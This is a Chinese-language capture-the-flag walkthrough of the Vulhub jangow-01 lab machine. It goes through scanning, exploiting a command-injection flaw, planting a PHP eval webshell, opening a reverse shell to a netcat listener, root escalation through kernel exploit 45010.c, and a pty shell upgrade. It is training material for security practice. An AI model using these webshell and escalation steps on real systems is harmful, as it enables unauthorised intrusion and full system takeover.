Nmap扫描主机
192.168.56.100是我们的主机,那么192.168.56.118就是我们的目标主机。我们可以发现开放21和80端口。我们用nmap对192.168.56.118进行详细扫描
访问一下80端口
随便都点击了一下,没发现什么。扫一下目录
发现了workpress目录,上去也没发现什么
再进行仔细查看,点击之后发现这个页面是空白的
发现这里可以传参
可以执行命令,典型的rce
我们直接写入一句话木马
echo 'eval($_POST['shell']); ' >> getshell.php @
使用中国蚁剑连接
上面找一下flag,在home目录下找到了一个
再找找有没有用的信息
又发现了一个备份文件
想起来之前扫除了个ftp服务,用已经有的账号密码登录试试看。用备份文件的账号密码登录上去了,没发现什么内容
尝试反弹shell拿shell
通过蚁剑写入shell,web访问反弹(这里反弹的shell不是交互式shell)
这里尝试过很多端口,只有反弹443端口才能成功,可能是靶机有限制
打开nc进行监听
打开浏览器进行访问
成功拿到反弹的shell(注意:写入shell那是监听主机的ip)
查看系统内核版本尝试找内核漏洞提权
查看是否存在内核漏洞尝试进行提取
将45010.c下载下来,编译后,通过蚁剑上传到靶机
由于kali没安装“增强功能(virtualbox的一个功能)”,我们在kali上开启http访问,在主机上用浏览器进行下载
下载完后用中国蚁剑上传到目标主机
在返回的shell中执行,先查一下是否安装gcc服务
编译
赋予执行的权限
拿到了root权限,进入了root目录,拿到shell
补充一下,现在拿到的shell是伪shell,我们拿一个正常shell(伪shell容易断开,正常shell不容易断开,但前提是安装python或者python3)。在伪shell输入
python3 -c 'import pty; pty.spawn("/bin/bash")'
原文始发于微信公众号(GSDK安全团队):Vulhub靶场 -- jangow-01-1.0.1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论